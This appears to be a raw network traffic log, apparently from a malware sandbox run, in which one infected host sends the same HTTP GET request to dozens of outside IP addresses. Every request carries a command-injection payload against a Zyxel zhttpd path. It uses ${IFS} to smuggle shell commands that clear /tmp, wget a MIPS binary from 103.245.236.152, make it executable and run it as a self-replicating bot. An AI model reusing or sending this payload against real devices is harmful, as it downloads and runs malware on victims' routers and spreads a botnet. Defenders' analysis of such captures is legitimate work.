                                            Jan 14, 2024 15:50:40.437160015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4647192.168.2.2345828175.65.121.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437186003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4648192.168.2.236070289.174.30.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437196016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4649192.168.2.233697864.234.65.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437232971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4650192.168.2.233680493.23.13.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437262058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4651192.168.2.2346376222.46.171.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437277079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4652192.168.2.2360262156.6.92.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437300920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4653192.168.2.2349780117.142.227.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437330961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4654192.168.2.234194438.113.238.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437372923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4655192.168.2.235186270.190.20.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437406063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4656192.168.2.2334750171.58.55.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437443972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4657192.168.2.233573841.114.1.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437489033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4658192.168.2.2356236142.121.62.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437500000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4659192.168.2.23349029.10.52.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437530994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4660192.168.2.2355410138.239.2.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437577963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4661192.168.2.233317080.198.178.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437608957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4662192.168.2.2351438117.46.207.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437634945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4663192.168.2.235443290.22.131.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437669992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4664192.168.2.2352426160.177.170.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437694073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4665192.168.2.2349984171.64.178.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437714100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4666192.168.2.2346492204.161.125.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437732935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4667192.168.2.235256467.52.111.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437742949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4668192.168.2.2345534111.207.175.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437772036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4669192.168.2.2351468103.49.128.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437829971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4670192.168.2.2349518149.155.145.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437850952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4671192.168.2.2338382188.185.118.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437882900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4672192.168.2.2336822102.85.114.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437917948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4673192.168.2.236007861.53.160.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437946081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4674192.168.2.233549039.239.16.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437947989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4675192.168.2.235416459.201.146.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437992096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4676192.168.2.2353624125.1.204.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438050032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4677192.168.2.2355474129.188.59.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438066959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4678192.168.2.2333786176.167.154.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438092947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4679192.168.2.235050046.64.34.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438117981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4680192.168.2.235885035.13.83.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438169003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4681192.168.2.235756476.104.138.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438175917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4682192.168.2.234359258.54.235.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438210964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4683192.168.2.2353048149.177.159.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438241005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4684192.168.2.2345244201.249.238.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438266039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4685192.168.2.2349138212.12.6.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438286066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4686192.168.2.235261894.162.175.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438311100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4687192.168.2.233808051.33.157.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438359976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4688192.168.2.234577864.25.27.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438385963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4689192.168.2.2341796162.75.54.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438435078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4690192.168.2.2345178201.37.40.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438463926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4691192.168.2.2354100202.17.34.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438474894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4692192.168.2.2345940203.104.56.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438508034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4693192.168.2.2355668123.41.17.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438560963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4694192.168.2.2337184157.9.59.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438577890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4695192.168.2.233877276.34.204.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438599110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4696192.168.2.234309044.60.148.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438653946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4697192.168.2.2355918178.127.249.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438677073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4698192.168.2.235983259.101.73.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438694954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4699192.168.2.2346596207.112.21.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438724041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4700192.168.2.2335884221.203.14.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438728094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4701192.168.2.233872812.187.35.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438747883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4702192.168.2.235086654.107.255.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438807964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4703192.168.2.2342172147.204.47.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438821077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4704192.168.2.234562080.102.142.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438873053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4705192.168.2.2354234188.2.160.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438901901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4706192.168.2.234243620.123.81.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438936949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4707192.168.2.2349284201.217.58.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.438987970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4708192.168.2.2337468156.220.249.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439002037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4709192.168.2.2338190216.90.150.133443
                                            TimestampBytes transferredDirectionData
